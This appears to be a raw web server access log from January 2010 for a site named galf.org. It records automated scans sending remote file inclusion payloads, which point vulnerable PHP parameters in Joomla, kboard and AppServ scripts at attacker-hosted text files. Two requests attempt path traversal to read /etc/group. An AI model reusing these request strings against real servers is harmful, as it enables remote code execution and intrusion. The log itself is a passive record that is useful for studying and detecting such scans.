65.23.156.168 - - [11/Jan/2010:00:29:57 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:30:26 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:30:26 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:30:26 -0800] "GET /logs/access_090831.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:30:53 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:30:53 -0800] "GET /logs/access_090427.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:30:53 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:30:55 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:30:55 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:30:55 -0800] "GET /logs/access_090427.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:31:01 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:31:01 -0800] "GET /logs/access_090608.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:31:01 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [11/Jan/2010:00:32:18 -0800] "GET /logs/access_090720.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [11/Jan/2010:00:32:29 -0800] "GET /logs/access_090525.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:02 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:02 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:08 -0800] "GET /logs/access_091109.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:17 -0800] "GET /logs/access_091102.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:29 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:29 -0800] "GET /logs/access_091109.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:29 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:29 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:29 -0800] "GET /logs/access_091109.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:31 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:50 -0800] "GET /logs/access_091102.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:34:54 -0800] "GET /logs/access_091102.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:35:38 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:35:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:35:38 -0800] "GET /logs/access_090427.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:36:52 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:36:52 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:36:53 -0800] "GET /logs/access_091123.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [11/Jan/2010:00:37:37 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.228.240.75 - - [11/Jan/2010:00:39:58 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
207.228.240.75 - - [11/Jan/2010:00:39:58 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:41:45 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:41:45 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:41:45 -0800] "GET /logs/access_091228.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:42:16 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:42:16 -0800] "GET /logs/access_091228.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:42:16 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:46:46 -0800] "GET /logs/access_090525.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:12 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:12 -0800] "GET /logs/access_090921.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.191.166.24 - - [11/Jan/2010:00:48:17 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.191.166.24 - - [11/Jan/2010:00:48:17 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.191.166.24 - - [11/Jan/2010:00:48:17 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.191.166.24 - - [11/Jan/2010:00:48:17 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:43 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:43 -0800] "GET /logs/access_090921.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:51 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:52 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:48:52 -0800] "GET /logs/access_090921.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:49:08 -0800] "GET /logs/access_090921.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:49:08 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:49:08 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [11/Jan/2010:00:49:25 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [11/Jan/2010:00:49:25 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [11/Jan/2010:00:49:25 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [11/Jan/2010:00:49:25 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.191.166.24 - - [11/Jan/2010:00:49:32 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.191.166.24 - - [11/Jan/2010:00:49:32 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:49:59 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:49:59 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:49:59 -0800] "GET /logs/access_090831.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:50:02 -0800] "GET /logs/access_090831.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:50:03 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:50:03 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:50:04 -0800] "GET /logs/access_090921.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [11/Jan/2010:00:50:06 -0800] "GET /logs/access_091207.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [11/Jan/2010:00:50:06 -0800] "GET /logs/access_090824.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.romantik-50plus.de/bilder_web/wandern/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:00:50:08 -0800] "GET /logs/access_090921.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.94.145 - - [11/Jan/2010:00:51:24 -0800] "GET /logs//facileforms.frame.php?ff_compath=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
72.44.94.145 - - [11/Jan/2010:00:51:24 -0800] "GET /facileforms.frame.php?ff_compath=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:52:17 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:52:24 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:52:24 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:52:26 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:53:06 -0800] "GET /logs/access_090720.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:53:41 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:54:15 -0800] "GET /logs/access_091123.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:00:54:33 -0800] "GET /logs/access_091123.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:00:54:48 -0800] "GET /appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:00:54:48 -0800] "GET /logs/access_100104.log%20%20/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:00:54:48 -0800] "GET /logs/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:56:35 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:56:35 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:56:35 -0800] "GET /logs/access_090921.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:00:56:36 -0800] "GET /logs/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [11/Jan/2010:00:56:36 -0800] "GET /appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [11/Jan/2010:00:56:36 -0800] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.175.5.130 - - [11/Jan/2010:00:57:02 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:57:02 -0800] "GET /logs/access_090921.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:57:02 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:57:02 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:57:07 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:57:11 -0800] "GET /logs/access_090629.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:00:57:17 -0800] "GET /logs/access_090629.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:01:07 -0800] "GET /logs/access_090706.log//include.php?path[docroot]=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:01:07 -0800] "GET /include.php?path[docroot]=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:01:08 -0800] "GET /logs//include.php?path[docroot]=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:01:17 -0800] "GET /include.php?path[docroot]=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:01:17 -0800] "GET /logs/access_090706.log//include.php?path[docroot]=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:01:17 -0800] "GET /logs//include.php?path[docroot]=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:01:02:50 -0800] "GET /logs/access_100104.log/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
